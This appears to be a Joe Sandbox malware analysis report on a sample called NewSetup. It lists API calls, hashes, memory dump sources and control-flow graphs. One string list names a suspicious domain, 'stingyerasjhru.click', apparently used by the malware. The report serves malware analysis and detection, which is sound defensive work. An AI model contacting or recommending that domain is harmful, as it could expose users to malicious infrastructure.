• API String ID:
• Opcode ID: 1c0d12c9a99588afc0228d4fa87b0174b806bc378e82852da8173d20f038194d
• Instruction ID: a88b84bcb89b3d6ac77efd8ecf4a730f2091b902b3f6a34e0560bcdb53c8b392
• Opcode Fuzzy Hash: 1c0d12c9a99588afc0228d4fa87b0174b806bc378e82852da8173d20f038194d
• Instruction Fuzzy Hash: F021C231224236FF8B20AFE5FC8096AB7ACFF403647114516F855A7210EB32EC348BA0
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 002331C6
  • Part of subcall function 0022C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0022D895,?,00000000,-00000008), ref: 0022C082
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002331FE
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0023321E
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide
• String ID:
• API String ID: 158306478-0
• Opcode ID: 253b1657ea536f7d7d7c11be5dbf875ed1b583fe5a1d08d0e4f73e0484315cf0
• Instruction ID: 8ebc08137a9a41f3131f248e9e765ac421d26b996f6471121d3e4ebfa39738f5
• Opcode Fuzzy Hash: 253b1657ea536f7d7d7c11be5dbf875ed1b583fe5a1d08d0e4f73e0484315cf0
• Instruction Fuzzy Hash: 0811C4F65316267EA7126BB5BC8ECBF6A5CDE86795B100015FE01D1100FFA4DF2085B2
                                                                                                      APIs
                                                                                                      • __EH_prolog3.LIBCMT ref: 0021E899
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0021E8A3
                                                                                                      • int.LIBCPMT ref: 0021E8BA
                                                                                                        • Part of subcall function 0021C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0021C1F6
                                                                                                        • Part of subcall function 0021C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0021C210
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0021E914
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                      • String ID:
                                                                                                      • API String ID: 1383202999-0
                                                                                                      • Opcode ID: ada35f406293fcb543c6a82799591b507e54fac0e5fc7f408bf9b3c0b3d5f09f
                                                                                                      • Instruction ID: c11387cb3629fc40d0de1bf19bab857dd9cb23d7c0e913788dbd39b0da79b095
                                                                                                      • Opcode Fuzzy Hash: ada35f406293fcb543c6a82799591b507e54fac0e5fc7f408bf9b3c0b3d5f09f
                                                                                                      • Instruction Fuzzy Hash: 891102759251159BCF05EF64C9056FDBBF1AFA4720F350008E8116B292CF749AA0CF81
                                                                                                      APIs
                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0023A2EF,00000000,00000001,00000000,?,?,00234390,?,00000000,00000000), ref: 0023ADB7
                                                                                                      • GetLastError.KERNEL32(?,0023A2EF,00000000,00000001,00000000,?,?,00234390,?,00000000,00000000,?,?,?,00233CD6,00000000), ref: 0023ADC3
                                                                                                        • Part of subcall function 0023AE20: CloseHandle.KERNEL32(FFFFFFFE,0023ADD3,?,0023A2EF,00000000,00000001,00000000,?,?,00234390,?,00000000,00000000,?,?), ref: 0023AE30
                                                                                                      • ___initconout.LIBCMT ref: 0023ADD3
                                                                                                        • Part of subcall function 0023ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0023AD91,0023A2DC,?,?,00234390,?,00000000,00000000,?), ref: 0023AE08
                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0023A2EF,00000000,00000001,00000000,?,?,00234390,?,00000000,00000000,?), ref: 0023ADE8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                      • String ID:
                                                                                                      • API String ID: 2744216297-0
                                                                                                      • Opcode ID: 623dc61cc681e19b9e34b1fd302f50be916f7a1de0cbcc683530875fd19ca169
                                                                                                      • Instruction ID: 157d96b3f2fbdec397b18e64c51d73b833da8490f18b74337e6051ad5768cce3
                                                                                                      • Opcode Fuzzy Hash: 623dc61cc681e19b9e34b1fd302f50be916f7a1de0cbcc683530875fd19ca169
                                                                                                      • Instruction Fuzzy Hash: 5AF0127A510119BBCF622FD5FC0C99A3F26FF46761F004021FD4885120D7728C609B92
                                                                                                      APIs
                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00220507
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00220516
                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0022051F
                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0022052C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2933794660-0
                                                                                                      • Opcode ID: 095853ed0b714497ddfb9c9fee31804be37d140315b2ca83479760357136bf5c
                                                                                                      • Instruction ID: 49369ffbd73760dc1cf695b56936e73221517f2c8ea5ca94d76ef9d35779b183
                                                                                                      • Opcode Fuzzy Hash: 095853ed0b714497ddfb9c9fee31804be37d140315b2ca83479760357136bf5c
                                                                                                      • Instruction Fuzzy Hash: 31F05F74D1020DEBCB00DFB4EA8D99EBBF4FF1E204B914996A412E6110EA30AA449B51
                                                                                                      APIs
                                                                                                      • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0022B893,?,?,00000000,00000000,00000000,?), ref: 0022B9B7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EncodePointer
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                      • Opcode ID: 8f3e36b5dc4f0d4a15cfb3b9ccf89540dbfd2d4157cf35bf35976f7b29427607
                                                                                                      • Instruction ID: 5611a6c02e564ee5fc3a0c5ff2e73d51f9bc7170177849487342f8150674240e
                                                                                                      • Opcode Fuzzy Hash: 8f3e36b5dc4f0d4a15cfb3b9ccf89540dbfd2d4157cf35bf35976f7b29427607
                                                                                                      • Instruction Fuzzy Hash: 1741593191021ABFCF16DF94EC81AAEBBB5BF48300F188159F91467211D73599A0DF91
                                                                                                      APIs
                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0022B475
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___except_validate_context_record
                                                                                                      • String ID: csm$csm
                                                                                                      • API String ID: 3493665558-3733052814
                                                                                                      • Opcode ID: a36174258e45852b36b22d8f2bea981464a965771cbb2b913c3666622ff9f2f2
                                                                                                      • Instruction ID: f68dab7a159670663104e1dc03a8d38a35b707b22b24a98db861540d252582a3
                                                                                                      • Opcode Fuzzy Hash: a36174258e45852b36b22d8f2bea981464a965771cbb2b913c3666622ff9f2f2
                                                                                                      • Instruction Fuzzy Hash: DE31D27642022AFBCF279FD0E8849AA7B6AFF08315B58465AF9540D122C336DD71DB81
                                                                                                      APIs
                                                                                                      • __alloca_probe_16.LIBCMT ref: 0021B8B9
                                                                                                      • RaiseException.KERNEL32(?,?,?,?,?), ref: 0021B8DE
                                                                                                        • Part of subcall function 0022060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0021F354,03013B20,?,?,?,0021F354,00213D4A,0024759C,00213D4A), ref: 0022066D
                                                                                                        • Part of subcall function 00228353: IsProcessorFeaturePresent.KERNEL32(00000017,0022C224), ref: 0022836F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 1924019822-1018135373
                                                                                                      • Opcode ID: b84095dd777531a7db53ba3a33df79e42f392d7cb47444ad99682c73d07c829f
                                                                                                      • Instruction ID: 4414103db8ab9109e5674e83c194ad14145070d036953b8c8fdd91ab5061b321
                                                                                                      • Opcode Fuzzy Hash: b84095dd777531a7db53ba3a33df79e42f392d7cb47444ad99682c73d07c829f
                                                                                                      • Instruction Fuzzy Hash: B421AF31D20219EBCF26DF95D849AEEB7F9AF64B10F160409E405AB250CB70ADA5CB91
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00212673
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___std_exception_copy
                                                                                                      • String ID: bad array new length$ios_base::badbit set
                                                                                                      • API String ID: 2659868963-1158432155
                                                                                                      • Opcode ID: 3b774e44a817ec3f54ae36044c3ea16b17335371b66309c4cc20c47a5483f354
                                                                                                      • Instruction ID: 7f10f873d3f112166a5bf5d80fc9fd7cfc5539585557a0bf292b39ede4b3e46c
                                                                                                      • Opcode Fuzzy Hash: 3b774e44a817ec3f54ae36044c3ea16b17335371b66309c4cc20c47a5483f354
                                                                                                      • Instruction Fuzzy Hash: C601D4F1528301ABDB08DF28E855A5A7BE8AF08718F01881CF45D8B341D375E868CB81
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0021F354,03013B20,?,?,?,0021F354,00213D4A,0024759C,00213D4A), ref: 0022066D
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00212673
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise___std_exception_copy
                                                                                                      • String ID: bad array new length$ios_base::badbit set
                                                                                                      • API String ID: 3109751735-1158432155
                                                                                                      • Opcode ID: 9239c4bcd6d626e3ed7962430c8bf86f9f701b67dd809284f0e8979666e001a4
                                                                                                      • Instruction ID: dd9911f4d63efadef56f0d0dddefa71053d63c83e6c512b7432ae42028786307
                                                                                                      • Opcode Fuzzy Hash: 9239c4bcd6d626e3ed7962430c8bf86f9f701b67dd809284f0e8979666e001a4
                                                                                                      • Instruction Fuzzy Hash: 33F0F8F1928310ABD704AF29E84974BBBE9EB45718F41881CF5989B301D3B5D468CF92

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:2.6%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:12
                                                                                                      Total number of Limit Nodes:0
                                                                                                      execution_graph 20575 40c830 CoInitializeEx 20570 40c865 CoInitializeSecurity 20571 43d1aa GetForegroundWindow 20572 43f030 20571->20572 20573 43d1b8 GetForegroundWindow 20572->20573 20574 43d1ce 20573->20574 20576 40e1fa 20577 4096a0 20576->20577 20578 40e206 CoUninitialize 20577->20578 20579 40e230 20578->20579 20580 40e642 CoUninitialize 20579->20580 20581 40e660 20580->20581

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 184 40e1fa-40e224 call 4096a0 CoUninitialize 187 40e230-40e270 184->187 187->187 188 40e272-40e28a 187->188 189 40e290-40e2d8 188->189 189->189 190 40e2da-40e337 189->190 191 40e340-40e364 190->191 191->191 192 40e366-40e377 191->192 193 40e379-40e387 192->193 194 40e39b-40e3a3 192->194 195 40e390-40e399 193->195 196 40e3a5-40e3a6 194->196 197 40e3bb-40e3c8 194->197 195->194 195->195 200 40e3b0-40e3b9 196->200 198 40e3ca-40e3d1 197->198 199 40e3eb-40e3f3 197->199 201 40e3e0-40e3e9 198->201 202 40e3f5-40e3f6 199->202 203 40e40b-40e415 199->203 200->197 200->200 201->199 201->201 204 40e400-40e409 202->204 205 40e417-40e41b 203->205 206 40e42b-40e437 203->206 204->203 204->204 207 40e420-40e429 205->207 208 40e451-40e57e 206->208 209 40e439-40e43b 206->209 207->206 207->207 211 40e580-40e5c3 208->211 210 40e440-40e44d 209->210 210->210 212 40e44f 210->212 211->211 213 40e5c5-40e5eb 211->213 212->208 214 40e5f0-40e602 213->214 214->214 215 40e604-40e65e call 40b750 call 4096a0 CoUninitialize 214->215 220 40e660-40e6a0 215->220 220->220 221 40e6a2-40e6ba 220->221 222 40e6c0-40e708 221->222 222->222 223 40e70a-40e767 222->223 224 40e770-40e794 223->224 224->224 225 40e796-40e7a7 224->225 226 40e7a9-40e7b7 225->226 227 40e7cb-40e7d3 225->227 228 40e7c0-40e7c9 226->228 229 40e7d5-40e7d6 227->229 230 40e7eb-40e7f8 227->230 228->227 228->228 233 40e7e0-40e7e9 229->233 231 40e7fa-40e801 230->231 232 40e81b-40e823 230->232 234 40e810-40e819 231->234 235 40e825-40e826 232->235 236 40e83b-40e845 232->236 233->230 233->233 234->232 234->234 237 40e830-40e839 235->237 238 40e847-40e84b 236->238 239 40e85b-40e867 236->239 237->236 237->237 240 40e850-40e859 238->240 241 40e881-40e99f 239->241 242 40e869-40e86b 239->242 240->239 240->240 244 40e9a0-40e9e3 241->244 243 40e870-40e87d 242->243 243->243 245 40e87f 243->245 244->244 246 40e9e5-40e9ff 244->246 245->241 247 40ea00-40ea12 246->247 247->247 248 40ea14-40ea60 call 40b750 247->248
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321984081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Uninitialize
                                                                                                      • String ID: Ds$]f$stingyerasjhru.click$}v
                                                                                                      • API String ID: 3861434553-3526389771
                                                                                                      • Opcode ID: 9c9c872ceee5d1727b78cb835495f79685d7af6cdecb67afa127824de112cc5a
                                                                                                      • Instruction ID: 28d4e5588af879f351e0c55689ec10c05792b3d9381e9559039d1688d12df22d
                                                                                                      • Opcode Fuzzy Hash: 9c9c872ceee5d1727b78cb835495f79685d7af6cdecb67afa127824de112cc5a
                                                                                                      • Instruction Fuzzy Hash: 1D12DEB154D3D18ED335CF2988907DBBFE1AFD2304F1989ADD8D86B252C6384906CB96

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 278 4269e0-4269f9 279 426a00-426a1e 278->279 279->279 280 426a20-426a2c 279->280 281 426a74-426a7f 280->281 282 426a2e-426a36 280->282 284 426a80-426a9e 281->284 283 426a40-426a47 282->283 286 426a50-426a56 283->286 287 426a49-426a4c 283->287 284->284 285 426aa0-426aa6 284->285 288 426aac-426ac6 call 43b460 285->288 289 426e1d-426e26 285->289 286->281 291 426a58-426a6c call 43cfa0 286->291 287->283 290 426a4e 287->290 296 426ad0-426aec 288->296 290->281 295 426a71 291->295 295->281 296->296 297 426aee-426afa 296->297 298 426b3f-426b43 297->298 299 426afc-426b04 297->299 301 426e14-426e1a call 43b4a0 298->301 302 426b49-426b52 298->302 300 426b10-426b17 299->300 305 426b20-426b26 300->305 306 426b19-426b1c 300->306 301->289 303 426b60-426b75 302->303 303->303 307 426b77-426b79 303->307 305->298 310 426b28-426b37 call 43cfa0 305->310 306->300 309 426b1e 306->309 311 426b80-426b8f call 408050 307->311 312 426b7b 307->312 309->298 315 426b3c 310->315 317 426bb0-426bba 311->317 312->311 315->298 318 426ba0-426bae 317->318 319 426bbc-426bbf 317->319 318->317 320 426bd3-426bdb 318->320 321 426bc0-426bcf 319->321 323 426be1-426bec 320->323 324 426e0b-426e11 call 408060 320->324 321->321 322 426bd1 321->322 322->318 326 426c3b-426c54 call 408050 323->326 327 426bee-426bf7 323->327 324->301 336 426c5a-426c60 326->336 337 426d7f-426da7 326->337 330 426c0c-426c10 327->330 331 426c12-426c1b 330->331 332 426c00 330->332 334 426c30-426c34 331->334 335 426c1d-426c20 331->335 338 426c01-426c0a 332->338 334->338 339 426c36-426c39 334->339 335->338 336->337 340 426c66-426c6c 336->340 341 426db0-426de2 337->341 338->326 338->330 339->338 342 426c70-426c7a 340->342 341->341 343 426de4-426e07 call 408ea0 call 408060 341->343 344 426c90-426c96 342->344 345 426c7c-426c82 342->345 343->324 348 426cc0-426ccc 344->348 349 426c98-426c9b 344->349 347 426d20-426d30 345->347 354 426d32-426d38 347->354 351 426d44-426d4c 348->351 352 426cce-426cd1 348->352 349->348 355 426c9d-426cb3 349->355 359 426d52-426d55 351->359 360 426d4e-426d50 351->360 352->351 356 426cd3-426d1f 352->356 354->337 358 426d3a-426d3c 354->358 355->347 356->347 358->342 361 426d42 358->361 362 426d57-426d79 359->362 363 426d7b-426d7d 359->363 360->354 361->337 362->347 363->347
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321984081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: $b%.$-,#"
                                                                                                      • API String ID: 2994545307-931030428
                                                                                                      • Opcode ID: 6a3802928c5f5a87aac56f19ec11622fc088211d542d43d856bad98c04f61c22
                                                                                                      • Instruction ID: eb0a7813bc495cb2fd809d80ca2ae1eeb419bef85b2bda93f64a55ce56aa5a2f
                                                                                                      • Opcode Fuzzy Hash: 6a3802928c5f5a87aac56f19ec11622fc088211d542d43d856bad98c04f61c22
                                                                                                      • Instruction Fuzzy Hash: 57B18A717083644BDB14DF24E8927BBB7A1EB91314F86853EE8858B381D63DDD05C39A

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 461 43d929-43d93a 462 43d940-43d967 461->462 462->462 463 43d969-43d971 462->463 464 43d977-43d982 463->464 465 43d35f-43d36f 463->465 466 43d990-43d997 464->466 467 43d370-43d397 465->467 469 43d9a3-43d9a9 466->469 470 43d999-43d99c 466->470 467->467 468 43d399-43d3a6 467->468 471 43d3d9-43d3ed 468->471 472 43d3a8-43d3b3 468->472 469->465 474 43d9af-43d9b9 call 43cfa0 469->474 470->466 473 43d99e 470->473 471->461 476 43d3c0-43d3cd 472->476 473->465 477 43d9be-43d9c1 474->477 479 43d3cf 476->479 477->465 479->471
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321984081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: D]+\
                                                                                                      • API String ID: 2994545307-1174097187
                                                                                                      • Opcode ID: 2cfa3c311a0e9c01cd225743fa52a5313a8d1775c02606c88f75f1f7f84942d4
                                                                                                      • Instruction ID: 7572c7809211613d87147b95baac5cf25656afb3abccc1c11bb3482e60d05e20
                                                                                                      • Opcode Fuzzy Hash: 2cfa3c311a0e9c01cd225743fa52a5313a8d1775c02606c88f75f1f7f84942d4
                                                                                                      • Instruction Fuzzy Hash: 0321F579B0C3458FD754AF55E88013F77A3ABCA310F28A52ED9C243356C6745C069A1A

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 484 43f080-43f09f 485 43f0a0-43f0a9 484->485 485->485 486 43f0ab-43f112 485->486 487 43f120-43f149 486->487 487->487 488 43f14b-43f156 487->488 489 43f195-43f19c 488->489 490 43f158-43f15a 488->490 491 43f160-43f168 490->491 492 43f171-43f177 491->492 493 43f16a-43f16d 491->493 492->489 495 43f179-43f18d call 43cfa0 492->495 493->491 494 43f16f 493->494 494->489 497 43f192 495->497 497->489
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321984081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: @
                                                                                                      • API String ID: 2994545307-2766056989
                                                                                                      • Opcode ID: a472d10b5f9a7e5390908e9f8f6212d90e40df790a0c6070693bbc59db7dec30
                                                                                                      • Instruction ID: 46bd95ab95da14b092a617a80e557a72b18f969592b6fa2af1023528b8fd012f
                                                                                                      • Opcode Fuzzy Hash: a472d10b5f9a7e5390908e9f8f6212d90e40df790a0c6070693bbc59db7dec30
                                                                                                      • Instruction Fuzzy Hash: 593132725083048BCB14DF18E8816ABBBF5FB96320F10693DE5858B390E7359C08CB96

                                                                                                      Control-flow Graph

                                                                                                      APIs
